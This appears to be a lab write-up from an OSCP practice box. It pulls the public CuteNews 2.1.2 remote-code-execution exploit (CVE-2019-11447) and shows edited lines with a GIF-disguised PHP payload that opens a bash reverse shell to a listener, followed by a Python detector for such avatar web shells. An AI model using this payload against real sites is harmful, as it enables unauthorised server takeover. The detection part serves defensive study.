adot@pwnbox:~/oscp/provinggrounds/easy/bbscute$ searchsploit -m 48800
Exploit: CuteNews 2.1.2 - Remote Code Execution
URL: https://www.exploit-db.com/exploits/48800
Path: /usr/share/exploitdb/exploits/php/webapps/48800.py
Codes: CVE-2019-11447
Verified: True
File Type: Python script, ASCII text executable
Copied to: /home/adot/oscp/provinggrounds/easy/bbscute/48800.py
Edit the script to remove the /CuteNews web directory from its URLs so that everything runs off the root directory of the website:
payload = f'''GIF89a;\n<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.45.216/1337 0>&1'");?>'''.encode()
payload_send = sess.post(f"{ip}/index.php", files = files).text
print("============================\nDropping to a SHELL\n============================")
os.system("curl " + (f"{ip}/uploads/avatar_{logged_user}_{logged_user}.php"))
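
A defender-side check for the pattern in the lines above, added here as an example (it is not part of these notes or of exploit 48800): it flags files in an avatar upload directory that carry a script extension or an image magic header followed by a PHP open tag, and access-log requests for a script under /uploads/. The function names are hypothetical, and the sample file contents and log lines are constructed.

```python
import re

# Server-side script extensions that should never appear in an avatar directory.
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar|pht)$", re.IGNORECASE)
# PHP open tags; a bare "<?" is ignored to limit false positives on binary image data.
PHP_TAG = re.compile(rb"<\?(php|=)", re.IGNORECASE)
# Magic bytes for GIF, PNG and JPEG.
IMAGE_MAGIC = (b"GIF87a", b"GIF89a", b"\x89PNG\r\n\x1a\n", b"\xff\xd8\xff")
# Request for an avatar_* script under /uploads/ in a combined-format access log line.
UPLOAD_SCRIPT_REQ = re.compile(
    r'"(?:GET|POST) (/uploads/avatar_[^ ?"]+\.(?:php\d?|phtml|phar|pht))[ ?]',
    re.IGNORECASE)


def classify_upload(name: str, data: bytes) -> list:
    """Return the reasons (possibly none) an uploaded avatar looks like a web shell."""
    findings = []
    if SCRIPT_EXT.search(name):
        findings.append("script-extension")
    if data.startswith(IMAGE_MAGIC) and PHP_TAG.search(data):
        findings.append("image-magic-with-php")
    return findings


def flag_requests(log_lines) -> list:
    """Return the requested paths of avatar files that are served as scripts."""
    hits = []
    for line in log_lines:
        match = UPLOAD_SCRIPT_REQ.search(line)
        if match:
            hits.append(match.group(1))
    return hits


# Constructed samples: a plain GIF, a GIF-prefixed .php file, a PNG header with a PHP tag.
SAMPLE_FILES = {
    "avatar_alice_alice.gif": b"GIF89a\x01\x00\x01\x00\x00\x00\x00;",
    "avatar_bob_bob.php": b"GIF89a;\n<?php /* inert placeholder */ ?>",
    "avatar_carol_pic.png": b"\x89PNG\r\n\x1a\n<?= 1 ?>",
}
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2024:10:00:00 +0000] "GET /uploads/avatar_alice_alice.gif HTTP/1.1" 200 43',
    '203.0.113.9 - - [01/Jan/2024:10:00:05 +0000] "GET /uploads/avatar_bob_bob.php HTTP/1.1" 200 0',
]

if __name__ == "__main__":
    for name, data in SAMPLE_FILES.items():
        print(name, classify_upload(name, data))
    print(flag_requests(SAMPLE_LOG))
```

The content check catches a renamed file that still starts with GIF89a; the extension and log checks catch the case shown here, where the upload keeps a .php name and is then requested directly.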